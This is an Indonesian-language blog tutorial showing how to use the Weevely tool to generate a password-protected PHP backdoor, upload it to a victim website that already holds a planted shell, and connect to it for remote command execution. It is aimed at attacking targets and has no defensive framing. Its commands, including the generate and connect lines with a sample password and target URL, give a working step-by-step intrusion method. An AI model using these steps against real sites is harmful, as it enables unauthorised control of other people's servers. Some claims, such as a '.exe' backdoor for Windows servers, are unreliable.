Malam sobat IT...
Kali ini AoiCyber akan berbagi sedikit trik and tips cara BackConnect reverse shell menggunakan Tools Weevely di kali linux.
Sebelum lanjut ada baiknya kita ketahui dahulu apa itu Weevely dan apa saja fungsinya.
Weeevely Menurut AoiCyber Adalah sebuah tools yang bisa melakukan remote code execution ,yang dimana ketika kita sudah membuat file weevely tersebut menggunakan command" yang akan saya sediakan dibawah nanti ,lalu di upload ke web target/korban ,maka si attacker akan mempunyai akses yang sangat yang luas kepada web target/korban.
Selain Itu AoiCyber Juga Berpendapat bahwa Tools Weevely ini bisa MemBypass ketika attacker melakukan backconnect menggunakan cara lain ,contoh semisal menggunakan ngrok + Netcat ,tapi gagal / tidak berhasil, maka tools weevely ini sangat recomended untuk kalian yang suka bermain" dengan security system .
Baik biar gak kelamaan kita langsung aja ke tutorial nya.
Pertama kalian siapkan terlebih dahulu bahan" dibawah Ini :
1.Terminal (Kali Linux ,dll) yang Penting sudah install tools weevely .
2.Akses Internet.
3.Web Yang sudah ditanam Backdoor / Shell.
4.Doa Dan Kesabaran.
Pertama kalian buka dulu terminal kalian untuk membuat php backdoor menggunakan Weevely.
Caranya dengan kalian mengetikkan Command" berikut :
$weevely generate Password namafile.php
kalian perhatikan pada command "password" & "namafile.php" ,dibagian password kalian isi dengan password yang kalian inginkan untuk melakukan backcnnect nantinya ,
dan dibagian namafile.php kalian bisa merubahnya sesuai keinginan kalian ,contohnya seperti ini :
$weevely generate Ghee1337 backconnect.php
lalu enter >>
"Ghee1337" adalah password untuk file backconnect saya nanti (backconnect.php)
"backconnect.php" adalah nama file yang akan saya upload ke web yang sudah ditanam shell backdoor, dan file "backconnect.php" itu membunyai password yaitu "Ghee1337" .
Jika masih kurang paham kalian bisa lihat gambar dibawah ini
Disitu muncul output bahwa tools weevely telah sukses dibuat menggunakan password "Ghee1337" dan nama filenya adalah "backconnect.php" .
yaps....jika file yang akan kita gunakan untuk backconnect sudah berhasil dibuat maka tinggal kita upload ke web yang sudah ditanam shell backdoor ,disini saya sudah mempunyai live target.
Jika file "backconnect.php" yang tadi dibuat dengan weevely sudah di upload maka tahap selanjutnya adalah mengakses file tersebut ,cara nya kalian akses seperti ini :
https://target.io/backconnect.php
lah kok cuman blank bang ...?
Tenang karena blank tersebut bukan tanda" dari error:)
sekarang coba buka lagi terminal kalian dan ketikkan command berikut :
$weevely https://target.io/backconnect.php Ghee1337
Perlu di ingat kalian jangan close dulu browse kalian!!!
dan kalian perlu perhatikan untuk melakukan backconnect dengan weevely kalian harus menyertakan password yang sudah kalian buat tadi ,dan diletakkan setelah urlnya ,contoh :
Jika Pada Praktek kalian sama seperti gambar diatas ,berarti kalian sudah sukses melakukan backconnect menggunakan Tools Weevely :)>
.Dan untuk melihat semua opsi / fitur" yang ada pada weevely kalian bisa mengetikan command "help" ,maka akan muncul semua fitur yang ada:).
Perlu di ingat bahwa Tools Weevely ini tidak bekerja pada semua situs / server ,ada juga yang mana pas kita akses file backconnect kita eh malah ada output kesalahan kode ,ya...mungkin memang tidak support menggunakan tools weevely ini .
Dan perlu Dicatat juga bahwa tidak semua ekstensi file yang kita buat bisa bekerja pada semua server ,berikut adalah ekstensi file backconnect weevely sesuai server :
Linux ,Ubuntu ,Debian dll : ext:".php" dll
Windows : ext:".exe"
Kayaknya cukup sampai disini dulu pembelajaran kita untuk hari ini ,dan ika dari kalian ada yang belum paham bisa comment dibawah ,dan untuk yang sudah mahir dalam dunia IT mohon untuk koreksinya ,benar / salah artikel yang saya buat ini kalian bisa langsung comment dibawah .
jika dari kalian ingin request tutorial" lainya silahkan comment dibawah .
Cukup Sekian dari saya Dan Terima Kasih .